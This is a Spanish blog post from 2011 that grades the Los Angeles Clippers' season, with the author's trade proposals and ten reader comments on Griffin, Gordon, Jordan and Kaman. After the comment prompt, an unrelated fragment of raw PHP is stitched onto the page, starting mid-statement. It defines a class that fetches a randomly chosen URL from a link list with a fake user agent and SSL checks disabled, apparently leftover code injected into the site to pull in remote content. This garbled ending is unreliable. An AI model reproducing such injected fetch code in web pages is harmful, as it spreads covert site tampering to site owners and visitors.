Los Angeles Clippers: Aprobado

12 de July de 2011 por Viva_Dirk

Lo más importante de la temporada de los Clippers podemos resumirla en dos palabras: Blake Griffin. El ala-pívot de 22 años es uno de esos jugadores capaces de cambiar el futuro de una franquicia, incluso de los Clippers. 22.5 puntos, 12.1 rebotes y 3.8 asistencias con más de un 50% en tiros de campo son números sobrenaturales en un rookie. El último en hacer algo similar fue Tim Duncan, ahí es nada.

A parte de Griffin hay que destacar la excelente campaña de Eric Gordon que se ha colocado en la élite anotadora de la liga, pero que se ha perdido nada menos que 26 partidos tras los 20 que se perdió la campaña pasada. Con la baja de Kaman durante gran parte de la temporada hemos podido ver a un buen center en DeAndre Jordan que tiene unas cualidades físicas para pelearse con los mejores centers de la liga, cubrir las espaldas de cualquiera y suponer un problema para las defensas. Durante buena parte del curso muchos se ilusionaron por ver a este grupo de jóvenes en play-offs, pero eso era algo secundario para la franquicia.

Lo mejor: Con Blake Griffin se acaban los calificativos, simplemente puede ser un jugador histórico. El nucleo Griffin-Gordon-Jordan tiene una media de 22 años. Además Bledsoe y Aminu son también de esa edad. Visto el rendimiento de Jordan pueden jugar con Kaman para buscar un traspaso. Tener dos centers de gran nivel es una gran baza con la que  negociar. Tienen pasta y ahora tienen a Griffin para atraer a una estrella.

Lo peor: La salud de Gordon que ya le ha hecho perderse demasiados partidos. La renovación de Jordan puede salir cara vista la falta de centers y no son muy dados a rascarse el bolsillo. Con este grupo de jugadores en otra franquicia hablaríamos sin tapujos sobre lo buenos que son. Estando en los Clippers nos preguntamos que desgracias les sucederan.

Jugando a GM

– La renovación de Jordan debe ser una prioridad. Encaja a la perfección con Griffin y pueden formar una pareja interior para una década entera. Salvo una salvajada lo renovaría. Digamos que 10 millones son posibles.

– A Kaman hay que sacarle provecho. Se ha hablado mucho de un traspaso con Iguodala y de que los Sixers piden algo bueno como compensación. Yo agotaría esa vía hasta el máximo. Si Iguodala no fuera posible otras opciones para el puesto de alero son Gerald Wallace o Jeff Green. La guinda para este proyecto sería traer a Steve Nash a finalizar su carrera peleando por todo, y si para ello hay que comerse algun contrato, sea.

– No gastaría la pasta ni firmaria la mid level a nadie. Con el nucleo que hay y lo que se saque por Kaman en el verano de 2012 hay hueco para Paul o Deron, la repera.

Comenta

10 comentarios a esta entrada

  1. Esteban dice:
    #1

    mmmmmmmmmm no se parece acertado tu GM, practicamente en nada

    primero no traspasaria a kaman, cuanto puede dar iguodala q no pueda dar un mid level como prince en la posicion de alero? asi podrian mantener a Kaman, este puede jugar junto a blake como junto a jordan, y asi armar un trio de internos de rotacion al estilo, gasol, biyun y odom, o los recodados trios de internos de los pintons: los dos wallace y okur, los dos wallace y mcdyes, rasheed, mcdyess y webber

    jugadores altos no sobran y creo que alli los clippers podrian sacarle una ventaja al resto, obviamente habra que poner mucha plata para renovar la prox campaña a kaman, pero un equipo no puede salir campeon si no esta dispuesto a gastar dinero

    sobre nash, deron o paul, dudo enormemente que quieran ser parte de los clippers, si bien tienen futuro, aun es futuro, y quiza medianamente lejano, dos años minimo para ser candidatos a final de conferencia, estando los knicks, los lakers y boston dispuestos a fichar a estos jugadores las posibilidades que eligan a los clippers creo que se redicen a 0, mas teniendo en cuenta su historial perdedor y desgraciado

    yo veria el nivel de Mo, y so juega similar a lo hecho desde que llego al equipo, incluso le renovaria, ya que saldria medianamente barato y bledsone creo que mostro que puede ser el base titular dentro de dos años

    sin lugar a dudas necesitan un alero este mismo año, ver a ryan gomes de titular al lado de tantos grandes jugadores es una pena, inlcuso aminu si bien es joven termina siendo uin fraude, un numero 7 del draft que no logra meterse en el equipo titular por que alli juega gomes, demuestra que su nivel fue flojisimo, hay que esperarlo, incluso lo veo parecido a odom, terminara siendo un alero ala pivote por su altura que puede en unos años ser util como recambio pero no mucho mas

    el resto gran material para el futuro, tienen la opcion de renovacion cualificada por dos ya estrellas de la liga como blake y gordon, mas un centro de los que no abundan como jordan, dos jovenes con contrato y preyeccion como bledsodne y aminu, un experimentado que brillo desde su traspaso como Mo, y un interno que en estas epocas vale oro como kaman, sin dudas un alero defensivo, capaz que cuajar algunos puntos y lanzar a pie firme les daria el salto de calidad, tienen 5 millones en el tope mas la excepcion de nivel medio, le daria eso a prince, y los clippers estarian este año en condicones de jugar PO

    que les espera la proxima temporada?

    dependera de:

    1) menos lesiones, sumar a prince, y un progreso moderado de sus jovenes, deberiamos verlos en los play offs

    2) explosion de aminu y bledsone, sumado a lo anterior, y estarian en semifinales de conferencia

    3) todo lo anterior, sumado a una super explosion de griffin, digamos que se vaya hasta los 28 pp, estamos hablando de un equipo que caeria en final de conferencia

      Citar

  2. Denise dice:
    #2

    Jugando a GM.
    Iguodala por Kaman, y en febrero cambias a Mo Williams por un expiring
    y en 2012 ir a muerte por Dwight Howard y a por Steve Nash, ya que tienen margen salarial de sobra para fichar a ambos, y te queda un equipito que en 2012/2013 podría ganar el anillo perfectamente.
    5 inicial: Nash-Gordon-Iguodala-Griffin-Howard
    Banquillo: Bledsoe, Foye, Aminu, De Andre Jordan y un par de jugadores más que podrían fichar con mid-levels y otras excepciones salariales.

    Este equipo sería realmente orgásmico de ver.

      Citar

  3. safd dice:
    #3

    Yo también pediría más en Iguodala-Kaman, te quitan a un alero completo por un pívot (que si que escasean) más viejo con tendencia a lesionarse.

    @Esteban no creo que consigan ni que les fuese beneficioso las finales de conferencia este año, deben ir madurando poco a poco, yo creo q haran como OKC, este año PO por primera vez y al siguiente año ya podrán luchar por lo bueno.

    Yo creo que no deben de envejecer la plantilla mucho, q jugadores con más de 27-28 años no deberían contratar, seguir intentando progresar, porq este nucleo de Gordon-Griffin-Jordan (que son los 3 mejores que tienen) aun deben de progresar. Los PO con la plantilla actual ya lo conseguirán este año, solo necesitan ir adquiriendo piezas (base, alero, banquillo) en 2-3 años para formar un buen proyecto.

    Yo una de las cosas que veo a favor de ellos esq sus jugadores importantes tienen contrato rookei, y cuando entre el nuevo convenio no tendrán problemas de cortar jugadores ni na de eso.

    Mediante agencia libre y trades creo que habria que intentar el quinteto:

    -Felton. Mediante la free agency en 2012
    -Gordon
    -Iguodala. Un Kama-Iguodala no parece que cuadre mucho, pero un Kaman-Aminu por una primera o segunda ronda mas iguodala si debería de colar.
    -Griffin
    -Jordan

    Ese quinteto en 2012 se convertiría en el mejor de la NBA, alero y center completos, top 5 en SG (me refiero en un futuro, ahora mismo no se si sería top 5, lo dudo), top 3 en PF, base jugón…

    Con un banquillo compensado, deberían de ser serios candidatos en 2013 o 2014.

    PD: Yo les daría un notable, por el lavado de cara al equipo, que este año ha ganado a equipos importantes y gusta a todo el mundo

      Citar

  4. Vader dice:
    #4

    Equipo a seguir, sobretodo por contar con la bestia de Griffin. Si en 2012 pueden atraer alguno de los grandes agentes libres pueden ser la repera… y tampoco lo descarto porque si Griffin sigue a este nivel fichar por un equipo con este jugador y que juega en los Angeles puede ser muy atractivo.

    Saludos

      Citar

  5. Txusma dice:
    #5

    Aqui lo importante es que los propietarios de los Clippers decidan poner de una vez dinero encima de la mesa. En varias ocasiones han tenido equipos prometedores (aquellos Clippers de Miles, Maggette, Odom y Richardson, todos con la cinta en la cabeza tb molaban y creo q un año coincidieron con Elton Brand) y los han dejado perder.

      Citar

  6. safd dice:
    #6

    Si hace falta yo doy dinero pa q este proyecto vaya adelante, si lo hacen bien dominarán una decada, mucha estrella se va al este, pero los dos mejores proyectos siguen estando en el oeste

      Citar

  7. Esteban dice:
    #7

    igual en mi opnion, estamos sobreimensionando a ERIC GORDON, no es una estrella ni muicho menos, tuvo consistencia la principio, pero una vez que exploto blake bajo sus numeros a sus ya clasicos 16 pp, jugador q no me gusta, obvio q lo apoyo por estar ya en el equipo, pero es muy bnajo en defensa y por eso tamb le cuesta a veces tirar en ataque, una especie de iverson con menos penetracion

    pero bueno, no deja de ser un gran jugador probable all-star en algun momento

      Citar

  8. safd dice:
    #8

    Pues a mi Eric Gordon me parece en cuanto a escoltas menores de 25 años uno de los grandes de la liga, junto con Harden y quizas Jordan Crawford más los de Sacramento y OJ si se centra(me dejare alguno posiblemente) me parece el escolta joven que haya demostrado mayor talento en la NBA. Wade esta temporada va a por 30 años ya y Bryant va pa arriba, Manu igual, JoJo igual, Allen igual, Terry igual…

    Yo creo que se asentará gordon como un jugador de 20-25 ppp y como escudero de lujo, all star durante 5-7 temporadas creo yo y algun tercer quinteto o incluso segundo en algun momento.

    En EEUU además confían mucho en el, el otro dia en una web vi q lo ponian en el top 35 de jugadores de la NBA, dice mucho de el.

      Citar

  9. Denise dice:
    #9

    Depende los gustos de cada uno, a mi Eric Gordon me gusta más que Stephen Curry, Monta Ellis o Brandon Jennings…

      Citar

  10. franitis dice:
    #10

    Mi primer comentario en TJNBA tras varios días leyendoos. Después de ver el movimiento de CP3 a Clippers me acordé de este artículo y al leerlo de nuevo hay cosas que coinciden mucho con lo que comentábais. Entra Paul, se renueva a Jordan y sale Kaman. Además, Gordon tras una lesión puede ser una incógnita, así que buscar un 2 de garantías sería el próximo paso, o tener a Billups de 2 puede ser otra opción.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>